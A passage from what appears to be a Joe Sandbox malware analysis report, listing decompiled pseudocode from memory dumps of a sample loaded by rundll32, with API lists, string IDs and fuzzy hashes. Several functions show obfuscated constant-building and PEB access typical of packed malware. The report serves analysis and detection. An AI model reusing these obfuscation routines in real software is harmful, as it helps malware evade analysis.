                                                                                                                                  					} while ( *_t82 != 0);
                                                                                                                                  				}
                                                                                                                                  				return _v12;
                                                                                                                                  			}













                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                  • Instruction ID: f50ffc8d7e571c998bfca487523b63fd10baa4c82e4847d23aa800ff1a0f06d8
                                                                                                                                  • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                  • Instruction Fuzzy Hash: 52311175D12348EBDF06DFA8CA4A2DEBBB0EF44314F608099D501A7265D3B14B98EF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D9011(void* __ecx, signed int __edx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				intOrPtr _t80;
                                                                                                                                  				signed int _t88;
                                                                                                                                  				signed int _t89;
                                                                                                                                  
                                                                                                                                  				_v40 = _v40 & 0x00000000;
                                                                                                                                  				_v44 = 0xa2b624;
                                                                                                                                  				_v8 = 0x99eb9;
                                                                                                                                  				_t88 = __edx;
                                                                                                                                  				_v8 = _v8 * 0x25;
                                                                                                                                  				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                                  				_v8 = _v8 << 5;
                                                                                                                                  				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                                  				_v24 = 0x77b72d;
                                                                                                                                  				_v24 = _v24 << 1;
                                                                                                                                  				_v24 = _v24 ^ 0x00e56894;
                                                                                                                                  				_v20 = 0x2ce6cf;
                                                                                                                                  				_v20 = _v20 >> 6;
                                                                                                                                  				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                                  				_v32 = 0xab4cd;
                                                                                                                                  				_v32 = _v32 >> 0xc;
                                                                                                                                  				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                                  				_v28 = 0x1f3eea;
                                                                                                                                  				_v28 = _v28 >> 9;
                                                                                                                                  				_v28 = _v28 ^ 0x0004326d;
                                                                                                                                  				_v12 = 0xc1e4f9;
                                                                                                                                  				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                                  				_v12 = _v12 + 0xcc91;
                                                                                                                                  				_v12 = _v12 >> 8;
                                                                                                                                  				_v12 = _v12 ^ 0x0038f912;
                                                                                                                                  				_v16 = 0x3b10d4;
                                                                                                                                  				_t89 = 0x6f;
                                                                                                                                  				_v16 = _v16 / _t89;
                                                                                                                                  				_v16 = _v16 + 0xffff4357;
                                                                                                                                  				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                                  				_v16 = _v16 ^ 0x074e6031;
                                                                                                                                  				_v36 = 0x1364c3;
                                                                                                                                  				_v36 = _v36 + 0x503c;
                                                                                                                                  				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                                  				_push(_v20);
                                                                                                                                  				_push(_v24);
                                                                                                                                  				_t75 = E002E5BFD(_v32, _v28, _v12, E002EDCF7(_v8, __ecx, _v36));
                                                                                                                                  				_t80 =  *0x2f3df8; // 0x0
                                                                                                                                  				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                                  				return E002DA8B0(_v16, _t74, _v36);
                                                                                                                                  			}


















                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bbcffae19a17f58652988d99330dd2db6a2339275f6f1778c9c0d6c506e1f797
                                                                                                                                  • Instruction ID: 97529e913b846f3c1a2590248b3a0205e9b0faea1cf122aa9a6833c0b53135bf
                                                                                                                                  • Opcode Fuzzy Hash: bbcffae19a17f58652988d99330dd2db6a2339275f6f1778c9c0d6c506e1f797
                                                                                                                                  • Instruction Fuzzy Hash: F231F071D0121EEBCF48EFA6D94A4EEBBB1FF44318F208199D421B6250D7B90A59DF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002D7FF2(void* __edx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				signed int _t67;
                                                                                                                                  				void* _t73;
                                                                                                                                  
                                                                                                                                  				_v32 = _v32 & 0x00000000;
                                                                                                                                  				_v40 = 0xdad9ef;
                                                                                                                                  				_v36 = 0x9bb390;
                                                                                                                                  				_v28 = 0x653306;
                                                                                                                                  				_v28 = _v28 + 0xffff1628;
                                                                                                                                  				_v28 = _v28 >> 3;
                                                                                                                                  				_v28 = _v28 ^ 0x000c892d;
                                                                                                                                  				_v12 = 0x5dd1e8;
                                                                                                                                  				_v12 = _v12 ^ 0xb170c383;
                                                                                                                                  				_v12 = _v12 | 0x2785cc64;
                                                                                                                                  				_v12 = _v12 >> 5;
                                                                                                                                  				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                                  				_v8 = 0x56f6d9;
                                                                                                                                  				_v8 = _v8 + 0xc121;
                                                                                                                                  				_t73 = __edx;
                                                                                                                                  				_t67 = 0x41;
                                                                                                                                  				_v8 = _v8 / _t67;
                                                                                                                                  				_v8 = _v8 << 7;
                                                                                                                                  				_v8 = _v8 ^ 0x00a76089;
                                                                                                                                  				_v24 = 0xf5edfd;
                                                                                                                                  				_v24 = _v24 | 0x2f446a90;
                                                                                                                                  				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                                  				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                                  				_v20 = 0xafa903;
                                                                                                                                  				_v20 = _v20 + 0xffff9fdf;
                                                                                                                                  				_v20 = _v20 ^ 0xafba618c;
                                                                                                                                  				_v20 = _v20 ^ 0xaf136809;
                                                                                                                                  				_v16 = 0x74f1b4;
                                                                                                                                  				_v16 = _v16 >> 7;
                                                                                                                                  				_v16 = _v16 | 0x7bde77db;
                                                                                                                                  				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                                  				return E002D1E22(_v28, _v24, _t73, E002D1DB9(_t67), _v20, _v16);
                                                                                                                                  			}















                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                  • Instruction ID: e53b513562d97e084033314999e811c2237173b379ba21f077688dac69ec0389
                                                                                                                                  • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                  • Instruction Fuzzy Hash: A521EFB2C0131EEBCB48DFE5D94A4EEFBB0BB10314F208189D511B2264C3B40B598F91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E4087() {
                                                                                                                                  
                                                                                                                                  				return  *[fs:0x30];
                                                                                                                                  			}




                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                  			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                  				void* __ebp;
                                                                                                                                  				signed int _t73;
                                                                                                                                  				struct HINSTANCE__* _t78;
                                                                                                                                  				_Unknown_base(*)()* _t79;
                                                                                                                                  				struct HINSTANCE__* _t81;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				unsigned int _t97;
                                                                                                                                  				void* _t113;
                                                                                                                                  				unsigned int _t115;
                                                                                                                                  				signed short _t123;
                                                                                                                                  				unsigned int _t124;
                                                                                                                                  				_Unknown_base(*)()* _t131;
                                                                                                                                  				signed short _t133;
                                                                                                                                  				unsigned int _t134;
                                                                                                                                  				intOrPtr _t143;
                                                                                                                                  				void* _t144;
                                                                                                                                  				int _t145;
                                                                                                                                  				int _t146;
                                                                                                                                  				signed int _t164;
                                                                                                                                  				void* _t167;
                                                                                                                                  				signed int _t169;
                                                                                                                                  				void* _t170;
                                                                                                                                  				int _t172;
                                                                                                                                  				signed int _t176;
                                                                                                                                  				void* _t177;
                                                                                                                                  				CHAR* _t181;
                                                                                                                                  				void* _t183;
                                                                                                                                  				void* _t184;
                                                                                                                                  
                                                                                                                                  				_t167 = __edx;
                                                                                                                                  				_t184 = _t183 - 0x118;
                                                                                                                                  				_t181 = _t184 - 4;
                                                                                                                                  				_t73 =  *0x100545cc; // 0x4cc2cb6b
                                                                                                                                  				_t181[0x118] = _t73 ^ _t181;
                                                                                                                                  				_push(0x58);
                                                                                                                                  				E10030D27(E10043F3E, __ebx, __edi, __esi);
                                                                                                                                  				_t169 = 0;
                                                                                                                                  				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                                  				 *(_t181 - 0x14) = 0;
                                                                                                                                  				 *(_t181 - 0x10) = 0;
                                                                                                                                  				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                                  				 *(_t181 - 0x18) = _t78;
                                                                                                                                  				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                                  				if(_t79 == 0) {
                                                                                                                                  					if(GetVersion() >= 0) {
                                                                                                                                  						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                                  						if(_t81 != 0) {
                                                                                                                                  							 *(_t181 - 0x14) = 0;
                                                                                                                                  							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
                                                                                                                                  							if( *(_t181 - 0x14) != 0) {
                                                                                                                                  								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                                  								_t145 = _t97 & 0x3ff;
                                                                                                                                  								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                                  								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                                  								 *(_t181 - 0x10) = 2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						 *(_t181 - 0x18) = 0;
                                                                                                                                  						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                                  							 *(_t181 - 0x44) = 0x10;
                                                                                                                                  							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                                  								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                                  								_t184 = _t184 + 0xc;
                                                                                                                                  								if(_t113 == 1) {
                                                                                                                                  									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                  									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                  									_t146 = _t115 & 0x3ff;
                                                                                                                                  									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                                  									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                                  									 *(_t181 - 0x10) = 2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							RegCloseKey( *(_t181 - 0x18));
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                                  					 *(_t181 - 0x14) = _t123;
                                                                                                                                  					_t124 = _t123 & 0x0000ffff;
                                                                                                                                  					_t164 = _t124 & 0x3ff;
                                                                                                                                  					 *(_t181 - 0x1c) = _t164;
                                                                                                                                  					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                                  					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                                  					 *(_t181 - 0x10) = 2;
                                                                                                                                  					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                                  					if(_t131 != 0) {
                                                                                                                                  						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                                  						 *(_t181 - 0x14) = _t133;
                                                                                                                                  						_t134 = _t133 & 0x0000ffff;
                                                                                                                                  						_t172 = _t134 & 0x3ff;
                                                                                                                                  						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                                  						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                                  						 *(_t181 - 0x10) = 4;
                                                                                                                                  					}
                                                                                                                                  					_t169 = 0;
                                                                                                                                  				}
                                                                                                                                  				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                                  				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                                  				_t181[0x105] = 0;
                                                                                                                                  				_t181[0x104] = 0;
                                                                                                                                  				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                                  					_t143 = 0x20;
                                                                                                                                  					E10030030(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                                  					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                                  					 *(_t181 - 0x5c) = _t181;
                                                                                                                                  					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                                  					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                                  					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                                  					E10014538(_t181 - 0x3c, 0xffffffff);
                                                                                                                                  					 *(_t181 - 4) = _t169;
                                                                                                                                  					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                                  						E1001461E(_t181 - 0x3c);
                                                                                                                                  					}
                                                                                                                                  					_t176 = 0;
                                                                                                                                  					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                                  						L23:
                                                                                                                                  						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                                  						E10014C3E(_t181 - 0x3c);
                                                                                                                                  						_t92 = _t169;
                                                                                                                                  						goto L24;
                                                                                                                                  					} else {
                                                                                                                                  						while(1) {
                                                                                                                                  							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
                                                                                                                                  							if(_t94 != _t169) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							_t176 =  &(1[_t176]);
                                                                                                                                  							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							goto L23;
                                                                                                                                  						}
                                                                                                                                  						_t169 = _t94;
                                                                                                                                  						goto L23;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t92 = 0;
                                                                                                                                  					L24:
                                                                                                                                  					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                                  					_pop(_t170);
                                                                                                                                  					_pop(_t177);
                                                                                                                                  					_pop(_t144);
                                                                                                                                  					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                                  				}
                                                                                                                                  			}
































                                                                                                                                  0x10014e7a
                                                                                                                                  0x10014e7a
                                                                                                                                  0x10014e81
                                                                                                                                  0x10014e81
                                                                                                                                  0x10014e86
                                                                                                                                  0x10014e89
                                                                                                                                  0x10014ea0
                                                                                                                                  0x10014ea7
                                                                                                                                  0x10014eb6
                                                                                                                                  0x10014fec
                                                                                                                                  0x10014ff3
                                                                                                                                  0x10015003
                                                                                                                                  0x10015006
                                                                                                                                  0x10015009
                                                                                                                                  0x10015010
                                                                                                                                  0x10015013
                                                                                                                                  0x1001501a
                                                                                                                                  0x10015026
                                                                                                                                  0x10015030
                                                                                                                                  0x10015035
                                                                                                                                  0x10015035
                                                                                                                                  0x1001503a
                                                                                                                                  0x1001503f
                                                                                                                                  0x1001505c
                                                                                                                                  0x1001505c
                                                                                                                                  0x10015063
                                                                                                                                  0x10015068
                                                                                                                                  0x00000000
                                                                                                                                  0x10015041
                                                                                                                                  0x10015041
                                                                                                                                  0x10015048
                                                                                                                                  0x10015050
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10015052
                                                                                                                                  0x10015056
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10015058
                                                                                                                                  0x1001505a
                                                                                                                                  0x00000000
                                                                                                                                  0x1001505a
                                                                                                                                  0x10014ebc
                                                                                                                                  0x10014ebc
                                                                                                                                  0x1001506a
                                                                                                                                  0x1001506d
                                                                                                                                  0x10015075
                                                                                                                                  0x10015076
                                                                                                                                  0x10015077
                                                                                                                                  0x1001508c
                                                                                                                                  0x1001508c

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                  • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                  • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                  • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                  • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                                  • _memset.LIBCMT ref: 10014FF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                  • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                  • API String ID: 434808117-483790700
                                                                                                                                  • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                  • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                  • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                  • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E1002E129(intOrPtr* __ecx) {
                                                                                                                                  				intOrPtr* _t27;
                                                                                                                                  
                                                                                                                                  				_t27 = __ecx;
                                                                                                                                  				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                                  				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                                  				return _t27;
                                                                                                                                  			}





                                                                                                                                  APIs
                                                                                                                                  • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                  • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                  • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                  • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                  • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                  • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                  • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                  • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                  • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                  • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                  • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                  • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClipboardFormatRegister
                                                                                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                  • API String ID: 1228543026-2889995556
                                                                                                                                  • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                  • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                  • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                  • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E1003548E(void* __ebx, void* __edx) {
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                  				long _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				int _t12;
                                                                                                                                  				void* _t18;
                                                                                                                                  				intOrPtr _t21;
                                                                                                                                  				long _t26;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t37;
                                                                                                                                  				struct HINSTANCE__* _t38;
                                                                                                                                  				void* _t41;
                                                                                                                                  				void* _t43;
                                                                                                                                  
                                                                                                                                  				_t37 = __edx;
                                                                                                                                  				_t30 = __ebx;
                                                                                                                                  				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                                  					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
